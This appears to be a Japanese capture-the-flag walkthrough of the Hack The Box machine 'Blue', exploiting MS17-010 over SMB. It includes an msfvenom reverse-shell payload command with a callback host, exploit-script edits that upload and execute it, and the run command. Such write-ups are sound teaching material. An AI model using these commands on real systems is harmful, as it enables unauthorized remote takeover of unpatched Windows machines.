BlueはWindowsのマシンで、難易度はeasyです。

・使用ツール
nmap
msfvenom
流れとしては、以下のようになっています。
1.nmapのスクリプエンジンで「MS17-010」を特定
2.「MS17-010」のexploitをダウンロードして修正し実行
1.Enumeration
nmpaでオープンポートを確認

脆弱性確認のスクリプトエンジンを実行(–script vuln)

「MS17-010」の脆弱性があることを確認できます。
2.Exploitation
exploitをダウンロードします。
git clone https://github.com/helviojunior/MS17-010.git
リバースシェルのペイロードを作成します。
sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=1234 -f exe > reverseShell.exe

ncコマンドでリバースシェルを待ち受けます。

exploitコードをコピーします。

smbclientでパスワードなしで/Usersに接続できることを確認できました。

zzz_exploit.pyを修正します。
■修正前

■修正後
smbでパスワードなしで接続できたので、「USERNAME」は「\\」にします。
USERNAME = '\\'
smb_send_file(smbConn, '/home/kali/hackTheBox/Blue/reverseShell.exe', 'C', '/reverseShell.exe')
service_exec(conn, r'cmd /c c:\\reverseShell.exe')

exploitを実行しますが、「ImportError: No module named mysmb」のエラーが発生します。同じディレクトリに「mysmb.py」が必要みたいなので、コピーします。


再度exploitを実行すると、リバースシェルが成功します。管理者権限になっているので、特権エスカレーションは不要です。
python zzz_exploit.py 10.10.10.40 ntsvcs
